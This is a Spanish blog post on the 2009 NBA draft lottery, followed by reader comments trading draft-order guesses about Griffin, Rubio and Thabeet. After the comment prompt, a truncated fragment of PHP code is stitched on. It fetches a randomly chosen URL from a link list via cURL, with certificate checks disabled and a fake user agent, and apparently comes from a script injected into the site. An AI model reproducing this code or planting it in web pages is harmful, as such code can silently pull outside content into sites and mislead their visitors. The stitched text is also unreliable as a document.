Los Angeles Clippers elegirán primeros en el Draft

20 de May de 2009 por txusma

En Sacramento ya se las prometían muy felices dando por hecho que Blake Griffin o Ricky Rubio se incorporarían a su franquicia durante este verano. Pero el azar les ha dado la espalda y se tendrán que conformar con escoger en el cuarto lugar.

El equipo agraciado con la suerte de elegir al número ha resultado ser Los Angeles Clippers que busca por tercera vez en su historia escoger a ese jugador que cambie de una vez por todas el destino de una franquicia tradicionalmente perdedora. No lo fue Danny Manning en 1988 y mucho menos Michael Olowakandi en 1998. ¿Lo será Blake Griffin en este 2009? ¿O porqué no Ricky Rubio?

En segunda posición escogerán los Memphis Grizzlies (la última vez que les tocó tan arriba tenían la ronda traspasada a los Detroit Pistons) y en tercer lugar lo harán los más jóvenes, los Oklahoma City Thunder. Como ya hemos dicho Sacramento Kings se ha quedado con la cuarta posición y Washington Wizards completan los 5 primeros.

¿Y a partir de ahora que? Evidentemente, en España lo que más interesa es la franquicia que podría acoger el año que viene a nuestro niño prodigio, Ricky Rubio, y la verdad después de ver el sorteo no parece que haya un destino claro.

El draft de este año se presenta muy incierto provocado por la teórica poca calidad de los jugadores pero si algo estaba claro hasta ayer mismo es que Blake Griffin sería el número 1 y Ricky Rubio el número 2. Tras estos 2 increíbles jugadores, el nivel baja marcadamente. No parece que unos Clippers que cuentan en sus filas con Zach Randolph, Marcus Camby y Chris Kaman sean a priori un buen destino para un ala-pívot recién salido de la universidad pero teniendo a Baron Davis o Eric Gordon tampoco parece probable que arriesguen escogiendo con el número 1 a Ricky. Así que es posible que veamos movimientos en el vecino pobre californiano este año (por ejemplo traspasando el expiring de Marcu camby) llegando incluso a traspasar ese número 1 si un día se levantan agobiados. En todo caso, o escogen a Griffin o no escogen.

Así que a primera vista Memphis Grizzlies parece ser el destino una vez más de uno de nuestros compatriotas. En caso de llegar Ricky parece probable la salida de la que fue hace muy poco la principal apuesta de la franquicia, Michael Conley. De cualquier manera parece ser que los ositos también le tienen un ojo echado a Hasheem Thabeet, el pívot tanzano, que apunta a portento defensivamente hablando. Con un Marc Gasol que ha realizado una temporada de rookie estupenda parece una idea descabellada a no ser que quieran construir unas torres gemelas de lo más exótico.

Pero si los Grizzlies se vuelven locos (o no, eso el tiempo lo dirá) los que seguro no dejarán escapar a Rubio será los Thunder. La combinación Ricky Rubio – Russell Westbrook puede provocar pesadillas a cualquier otro equipo de la NBA y al lado de Kevin Durant o Jeff Green hay futuro y del bueno. En todo caso en Oklahoma están muy tranquilos porque la eleccion de Thabeet también les solucionaría una de sus grandes  necesidades. La falta de un pívot intimidador nato .

Se aceptan apuestas. Y en breve, empezaremos a teorizar sobre el draft de este año.

Comenta

5 comentarios a esta entrada

  1. Jabho dice:
    #1

    Pues interesante el asunto…. Faltan muchos entrenamientos para ver que pasa, pero los Clipper si piensan que Griffin puede ser una estrella dudo que lo traspasen. De hecho es que veo complicado que traspasen un pick 1…

    Memphis si puede venirse abajo a buscar un Jordan Hill con el 4 de Sac para que Sac busque a Ricky. Thunder creo que cogerá a Thabeet y creo que será lo correcto porque es justo lo que le falta, mucha fuerza interior…

    En fin, que falta mucho pero si que es posible que haya movimientos en función de como vean los equipos a los jugadores. A falta de estrellas claras que si ha habido otros años se esperan movimientos…

      Citar

  2. Txusma dice:
    #2

    La idea de los Clippers podria ser traspasar a Baron Davis (de vuelta a los Warriors?) por un lado y despues bajar 2 o 3 posiciones en el draft para intentar pillar alli a Ricky Rubio. El tema es q si le traspasas el número 1 a Sacramento, cuidado que no se quede con Ricky, así que la opción más pausible seria traspasarlo a Oklahoma (Westbrook – Durant – Griffin) y quedarse con el número 3.
    Por parte de Ricky parece que no tiene ganas de ir ni a Memphis ni a Oklhoma y q su primera opcion sería Los Angeles y sino Sacramento.
    Con todo este percal podemos encontrarnos con este escenario:
    1.- Oklahoma – Griffin
    2.- Memphis – Thabeet
    3.- Clippers – Rubio
    4.- Sacramento – Brandon Jenning

    Y todos mas o menos contentos.

      Citar

  3. Viva_Dirk dice:
    #3

    Dudo mucho que Memphis elija un center. Marc les ha dado un resultado excelente y su puesto a cubrir es un 4, ya sea en el mercado de agentes libres o en el draft.

    No se, no creo que los Clippers traspasen a Davis.

      Citar

  4. Txusma dice:
    #4

    Tras 24 traspasos a lo mejor se reordenan.

    1.- Grizzlies – Griffin
    2.- Oklahoma – Thabeet
    3.- Clippers – Rubio

    Ahora sí, todos contentos 😀

      Citar

  5. Txusma dice:
    #5

    Es más, se podría hacer un traspaso a 3 bandas en este sentido? Alguna vez se ha llevado a cabo?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>